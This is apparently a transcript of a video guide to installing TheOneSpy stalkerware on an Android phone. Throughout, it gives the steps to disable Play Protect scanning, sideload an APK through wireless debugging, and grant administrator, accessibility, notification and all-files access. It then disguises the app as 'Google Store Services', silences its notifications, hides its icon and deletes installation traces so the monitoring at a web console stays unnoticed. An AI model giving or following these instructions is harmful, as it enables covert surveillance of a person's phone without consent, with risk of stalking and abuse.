Welcome to the OneSpy, a complete guide and installation. Open the Google Play Store. Tap the account icon in the top right corner. Select Play Protect from the menu and review the options to ensure it is enabled for your device security. Tap the Settings icon in the top right corner. Turn off Scan Device for security threats and improve harmful app detection to adjust the protection settings as needed. Open any browser and type the URL TheOneSpy.co. After a few moments, a new page will load. Enter the activation code and click the Submit button. After a short wait, a pop-up will appear. Tap OK to begin the app download. After downloading, tap to install. A pop-up will appear. And then tap the Open button to launch the app. Once the application opens, select your desired language and tap Next. Tap on Allow to grant the permission. Install unknown source. Tap on the Download button to download the required app. Once downloaded, tap on Install to install the downloaded application. After successful installation, the new app will open automatically. If you find an issue like suspected voice phishing or suspicious app detected, tap on the back button. Now click on Suspicious app detected. Click here. Tap on Allow to enable developer option. Find Software Information and click on Build Number 4 times to enable developer option. Type your password for Continue process. Tap on the Pair button. Enable wireless debugging and tap on it. Press Pair with pairing code. A notification will appear saying Pairing found. Click on Enter pairing code button. Now tap on Install to install the app. After successful installation, the new app will open automatically. Once the application opens, you will receive several permission dialogues. For each, tap Allow while using the app, or Allow All as appropriate. Enter the activation code to activate the app and tap on the Activate Service button. After activation, tap on Allow button and then tap on Allow all the time. For OS greater than 10. Tap on the Allow button and then Allow management of all files to grant access to all files. Tap on the Allow button and then the Activate button to activate the device as an administrator. Grant Display over other apps or Appear on top permission by tapping on Allow and then turning on the switch for Allow. Disable the app notifications by tapping on the Allow button and then turning off the switch for Show notifications. Grant usage access permission to the app by tapping the Allow button and enabling the Allow permission switch for Google Store services. Grant notification access permission to the app by tapping on the Allow button and then turning on the switch for Google Store services. A dialog will appear. Tap the Allow button. Grant accessibility permission by tapping on the Allow button. Tap on Installed Apps. Then find Google Store Services from the app list and turn on the permission switch. If you want to hide the app, just click on OK. But if you want to change the app name and icon and make it visible on the home screen, then you may choose. Dialog will appear asking you, do you want to remove traces of this app? Tap on Yes to delete the installer application and the downloaded APK file from the Downloads folder. You can. Monitor device data by visiting https://console.theonespy.com. Thanks for watching.